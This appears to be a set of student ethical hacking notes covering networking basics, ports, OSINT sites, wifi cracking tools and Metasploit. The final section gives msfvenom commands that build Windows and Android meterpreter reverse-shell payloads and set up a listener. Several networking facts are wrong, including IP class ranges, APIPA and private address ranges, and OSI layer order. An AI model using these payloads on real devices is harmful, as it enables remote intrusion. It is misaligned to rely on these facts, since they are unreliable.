Professional Documents
Culture Documents
Ethical Hacking
Ethical Hacking
It is defined as a connection between 2 or more devices which are use to share data
.
Types:LAN ,WLAN,CAN,MAN,WAN,PAN..
IPv4--
1981.
32 bit Ip
4.3 millions addresses
Numeric.decimal Notation (192.168.1.1)
Range 0-255.
IPv6--
1998
128 bit IP
7.3*10 raised to 28 IP addreses
Aplhanumeric hexadecimal notation (2001:db8:3333:4444:5555:6666:7777:8888.)
Range 0-9 and A-F.
Classes
A:0-126 (used by organisations)
B:128-191 (used by MNC)
C:191-223 (Most common IPs)
D:224-239 (Goevernment registered IPs)
E:240-255 (used for Experiments)
Special IPs:
127.0.0.1 --Loopback or LocalHost Ip
169.0.0.1 --APIPA(Automatic Pvt IP Addresses)
255.0.0.1 --Broadcasting Ips
Private IPs:
A:10.0.0.1
B:178.16.1.1 To 178.32.1.1
C:192.168.1.1
-----------------------------------------------------------------------------------
----
#Ports (2/Aug)
Port State:
Open
close
Filtered(Specific)
Basic Ports
20-21:FTP File Transfer Protocol
22:SSH Secure Shell (Requires authentication)
23:Telnet Telytype Network
25:SMTP Simple mail transfer Pro
53:DNS Domain Name Systen (Used to link Domain and Domain Name to Ips)
67,68:DHCP Dynamic Host Config Pro (Provide IPs to newly Connected devices)
80:HTTP To host website (Plain Text )
110:POP3 Post Office Protocol
123:NTP N/W Transfer Pro
135-139: NetBios Name Service
143:IMAP4 Internet Msg acces pro
161-162:SNMP Simple N/W Management pro
389:LDAP Lightweight Dir Authentication Pro
443:HTTPs (Secured) {Uses SSL Secure Socket layer and TLS transport Layer
Secure to
encrypt DATA.}
445:Microsoft -DS (Active Directory) /////SMB (system Management Block)
2049:NFS N/W File sys
3389:RDP Remote Desktop Pro
5900:VNC Virtual N/W controller
4444 & 8080: Dynamic Port
-----------------------------------------------------------------------------------
----
#TCP
TCP Flags
SYN:Synchronise
ACK:Acknowledgement
FIN:Finish
RST:Reset
PSH:Push
URG:Urgent
1.Application
2.Presentation
3.Session
4.Transport
5.Network
6.Data Link
7.Physical
-----------------------------------------------------------------------------------
----
#Info Gathering
**Websites**
1.Netcraft
2.Wayback Machine
3.DNS Dumpster
4.Virus Total
5.WhoIs
6.Urlscan.io
7.Shodan (Info About Present Devices)
**Extensions**
1.Wapplyzer
2.FlagFox
3.W3Tech
**IP Info**
Grabify
IP2Location
Google Maps
OSINT Framework
-----------------------------------------------------------------------------------
---
#N/W Scanning
-----------------------------------------------------------------------------------
---
#Enumeration
Def:
The proc of extracting user names, machines name ,N/W resource ,shared and
services from a sys.
-----------------------------------------------------------------------------------
---
#WIFI Hacking
Tools:
aircrack-ng
aireplay-ng
airodump-ng
Wordlist:
cd /usr/share/wordlists/
Commands:
$ifconfig
$airodump-ng wlan0
----------------------------------------------------------------------------------
#Vulnerability Assesement
3Term:
CVE: Common vulnerability Exposure
CVSS: Common Vulnerability scoring system
CWE: Common Weakness Assesement
Toools Used:
Nessus Tenable (to find vulnerability and CVSS)
Websites :
CVE details
Rapid7
ExploitDB
----------------------------------------------------------------------------------
#Metasploit Framework
7 Module Of MF
1.Exploit :2315
2.Payloads :975
3.Auxiliary :1208
4.Post :412
5.Encoders :46
6.NOPs (NO Operation) :11
7.Evasion :9
Steps To use MF
----------------------------------------------------------------------------------
#GAINING ACCESS & CREATING VENOM
1.Windows 10
steps:
1.Create a VENOM
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=(Local IP) PORT=4444 -f
exe -o Test.exe
2.set a listener (in metasploit)
$use exploit/multi/handler
3.start service/server
$service apache2 start
$service postgresql start
4.set payload
$ set payload windows/meterpreter/reverse_tcp
To check sessions
$sessions
$sessions -i (session no)
**************************************************
2.Android
Create a venom
steps:
1.Create a VENOM
$msfvenom -p android/meterpreter/reverse_tcp LHOST=(Local IP) PORT=8080 -o
Test.apk
2.set a listener (in metasploit)
$use exploit/multi/handler
3.start service/server
$service apache2 start
$service postgresql start
4.set payload
$ set payload android/meterpreter/reverse_tcp